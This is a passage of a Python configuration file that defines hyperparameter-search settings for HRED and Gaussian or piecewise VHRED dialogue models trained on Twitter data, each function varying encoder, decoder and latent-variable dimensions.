        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration (disabled for this HRED baseline).
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': False,
        'train_latent_variables_with_kl_divergence_annealing': False,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': False,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_HRED_NormOp_ClusterExp4():
    """Twitter HRED cluster hyperparameter-search config (experiment 4).

    LSTM decoder, qdim_encoder=1000, qdim_decoder=4000, sdim=1000;
    all latent-variable options disabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration (disabled for this HRED baseline).
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': False,
        'train_latent_variables_with_kl_divergence_annealing': False,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': False,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_HRED_NormOp_ClusterExp5():
    """Twitter HRED cluster hyperparameter-search config (experiment 5).

    LSTM decoder, qdim_encoder=2000, qdim_decoder=4000, sdim=1000;
    all latent-variable options disabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 2000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration (disabled for this HRED baseline).
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': False,
        'train_latent_variables_with_kl_divergence_annealing': False,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': False,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
###
### Twitter - Hyperparameter search for Gaussian VHRED:
###
# sdim = {500, 1000}
# qdim_encoder = {1000}
# qdim_decoder = {1000, 2000, 4000}
# rankdim = 400
# latent_gaussian_per_utterance_dim = {100, 300}
# bidirectional_utterance_encoder = True
# reset_utterance_encoder_at_end_of_utterance = False
# reset_utterance_decoder_at_end_of_utterance = True
# lr = 0.0002
# bs = 80
# normop_type = 'LN'
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp1():
    """Twitter Gaussian-only VHRED cluster config (experiment 1).

    LSTM decoder, qdim_decoder=1000, sdim=500; Gaussian latent variable of
    dimension 100 with KL annealing and decoder token dropout enabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 1000,
        'sdim': 500,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp2():
    """Twitter Gaussian-only VHRED cluster config (experiment 2).

    LSTM decoder, qdim_decoder=1000, sdim=1000; Gaussian latent variable of
    dimension 100 with KL annealing and decoder token dropout enabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 1000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp3():
    """Twitter Gaussian-only VHRED cluster config (experiment 3).

    LSTM decoder, qdim_decoder=2000, sdim=1000; Gaussian latent variable of
    dimension 100 with KL annealing and decoder token dropout enabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp4():
    """Twitter Gaussian-only VHRED cluster config (experiment 4).

    LSTM decoder, qdim_decoder=4000, sdim=1000; Gaussian latent variable of
    dimension 100 with KL annealing and decoder token dropout enabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp5():
    """Twitter Gaussian-only VHRED cluster config (experiment 5).

    LSTM decoder, qdim_decoder=4000, sdim=1000; Gaussian latent variable of
    dimension 300 with KL annealing and decoder token dropout enabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian on (dim 300), piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 300,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
###
### Twitter - Hyperparameter search for Piecewise-Gaussian VHRED:
###
# sdim = {500, 1000}
# qdim_encoder = {1000}
# qdim_decoder = {1000, 2000, 4000}
# rankdim = 400
# latent_gaussian_per_utterance_dim = {100, 300}
# latent_piecewise_per_utterance_dim = {100, 300}
# gate_latent_piecewise_per_utterance = {False, True}
# bidirectional_utterance_encoder = True
# reset_utterance_encoder_at_end_of_utterance = False
# reset_utterance_decoder_at_end_of_utterance = True
# lr = 0.0002
# bs = 80
# normop_type = 'LN'
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp1():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 1).

    LSTM decoder, qdim_decoder=1000, sdim=500; Gaussian and piecewise latent
    variables both enabled at dimension 100, with KL annealing and decoder
    token dropout.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 1000,
        'sdim': 500,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp2():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 2).

    LSTM decoder, qdim_decoder=1000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 100, with KL annealing and decoder
    token dropout.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 1000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp3():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 3).

    LSTM decoder, qdim_decoder=2000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 100, with KL annealing and decoder
    token dropout.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp4():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 4).

    LSTM decoder, qdim_decoder=4000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 100, with KL annealing and decoder
    token dropout.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp5():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 5).

    LSTM decoder, qdim_decoder=4000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 300, with KL annealing and decoder
    token dropout.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on (dim 300).
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 300,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 300,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp6():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 6).

    LSTM decoder, qdim_decoder=2000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 100, with KL annealing and decoder
    token dropout, and the piecewise gating explicitly disabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on,
        # piecewise gating off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
        'gate_latent_piecewise_per_utterance': False,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp7():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 7).

    LSTM decoder, qdim_decoder=4000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 100, with KL annealing and decoder
    token dropout, and the piecewise gating explicitly disabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on,
        # piecewise gating off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
